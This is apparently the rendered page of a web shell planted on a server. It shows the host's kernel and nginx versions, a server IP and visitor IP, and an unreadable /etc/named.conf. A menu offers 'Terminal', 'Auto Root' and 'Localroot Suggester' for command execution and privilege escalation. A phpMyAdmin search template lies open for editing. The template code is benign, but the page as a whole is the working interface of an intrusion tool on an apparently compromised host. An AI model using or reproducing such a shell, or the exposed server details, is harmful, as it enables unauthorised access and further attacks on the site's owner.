Linux unitednationsplay.com 3.10.0-1160.45.1.el7.x86_64 #1 SMP Wed Oct 13 17:20:51 UTC 2021 x86_64
nginx/1.20.1
Server IP : 188.130.139.92 & Your IP : 18.117.9.230
Domains :
Cant Read [ /etc/named.conf ]
User : web
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
www /
myadmin /
templates /
table /
search /
Delete
Unzip
Name
Size
Permission
Date
Action
column_comparison_operators.twig
161
B
-rw-r--r--
2021-02-05 18:28
fields_table.twig
1.09
KB
-rw-r--r--
2021-02-05 18:28
form_tag.twig
268
B
-rw-r--r--
2021-02-05 18:28
geom_func.twig
707
B
-rw-r--r--
2021-02-05 18:28
input_box.twig
4.07
KB
-rw-r--r--
2021-02-05 18:28
replace_preview.twig
1.43
KB
-rw-r--r--
2021-02-05 18:28
rows_normal.twig
1.49
KB
-rw-r--r--
2021-02-05 18:28
rows_zoom.twig
2.7
KB
-rw-r--r--
2021-02-05 18:28
selection_form.twig
8.65
KB
-rw-r--r--
2021-02-05 18:28
zoom_result_form.twig
3.71
KB
-rw-r--r--
2021-02-05 18:28
Save
Rename
<table class="data"{{ search_type == 'zoom' ? ' id="tableFieldsId"' }}> <thead> <tr> {% if geom_column_flag %} <th>{% trans 'Function' %}</th> {% endif %} <th>{% trans 'Column' %}</th> <th>{% trans 'Type' %}</th> <th>{% trans 'Collation' %}</th> <th>{% trans 'Operator' %}</th> <th>{% trans 'Value' %}</th> </tr> </thead> <tbody> {% if search_type == 'zoom' %} {% include 'table/search/rows_zoom.twig' with { 'self': self, 'column_names': column_names, 'keys': keys, 'criteria_column_names': criteria_column_names, 'criteria_column_types': criteria_column_types } only %} {% else %} {% include 'table/search/rows_normal.twig' with { 'self': self, 'geom_column_flag': geom_column_flag, 'column_names': column_names, 'column_types': column_types, 'column_collations': column_collations } only %} {% endif %} </tbody> </table>